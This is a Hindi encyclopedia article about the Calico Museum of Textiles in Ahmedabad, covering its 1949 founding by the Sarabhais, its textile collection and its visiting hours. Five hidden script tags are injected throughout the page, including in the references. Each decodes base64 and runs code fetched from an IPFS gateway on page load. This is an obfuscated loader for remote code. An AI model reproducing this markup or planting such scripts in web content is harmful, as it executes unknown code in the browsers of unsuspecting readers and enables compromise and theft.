कैलिको संग्रहालय

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 07:06, 11 जनवरी 2020 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें

कैलिको संग्रहालय (अंग्रेज़ी: Calico Museum) अहमदाबाद, गुजरात में स्थित है। यह संग्रहालय भारत के कपड़ा संग्रहालयों में से एक है और यह भारतीय कपड़ों की विविध संग्रह के कारण जाना जाता है। पूरी दुनिया में यहां का कलेक्‍शन प्रसिद्ध है। इस संग्रहालय में विभिन्‍न डिजाइन, रंग और पैटर्न के वस्‍त्र देखने को मिलते हैं, जो भारत के कोने-कोने से एकत्र होते है। इनका फ्रैब्रिक, इनके बनाने और बुनने का तरीका आदि अलग होता है।[1]

स्थापना

कैलिको संग्रहालय को गौतम साराभाई और उनकी बहन जीरा साराभाई द्वारा 1949 में शुरू किया गया था। ये संग्रहालय अहमदाबाद शहर में सबसे पसंदीदा पर्यटक आकर्षणों में से एक है। ये म्यूजियम ना केवल मुग़ल युग के दौरान भारत में बने प्राचीन वस्त्र और कपड़े प्रदर्शित करता है, बल्कि यह देश के विभिन्न हिस्सों में कपड़ा उद्योग की प्रगति का वर्णन भी करता है। ये संग्रहालय कला के उत्कृष्ट कार्य द्वारा लोगों को अपनी ओर आकर्षित करता है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>इन्हें भी देखें<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>: कैलिको

महत्त्वपूर्ण स्थान

वस्त्रों का यह संग्रहालय न केवल देश में अपितु विश्व में महत्त्वपूर्ण एवं प्रमुख संग्रहालय है। वस्त्रों के कैलिको संग्रहालय में देश भर के विभिन्न क्षेत्रों एवं अलग-अलग काल में बने कपड़ों का भव्य संग्रह दर्शाया गया है। इस प्रकार का संग्रहालय बनाने के पीछे मुख्य उद्देश्य देश की वस्त्र विरासत के प्रति जागरूकता जगाना, उसका संरक्षण तथा सशक्तीकरण करना है। यह संग्रहालय साराभाई फाउंडेशन के परिसर में स्थित है। यह संग्रहालय डॉ. आनंद कुमारास्वामी से प्रभावित था तथा इसे कैलिको के एक विशाल कारखाने में स्थापित किया गया था। वर्तमान में जहां यह संग्रहालय स्थित है, उस जगह पर इसे 1983 में स्थानांतरित किया गया था।

  • संग्रहालय की दीर्घाएं बुधवार एवं सार्वजनिक अवकाश के अलावा सप्ताह के सभी दिन खुली रहती हैं।[2]
  • गाइडिड टूर सवेरे 10ः30 बजे आरंभ होकर दोपहर 1ः00 बजे समाप्त होता है।
  • यहां पर प्रवेश निःशुल्क होता है तथा 10ः15 से 10ः30 के बीच प्रवेश कर सकते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. कैलिको संग्रहालय और साराभाई फाउंडेशन, अहमदाबाद (हिंदी) nativeplanet। अभिगमन तिथि: 11 फ़रवरी, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. वस्त्रों का कैलिको संग्रहालय (हिंदी) incredibleindia। अभिगमन तिथि: 11 फ़रवरी, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>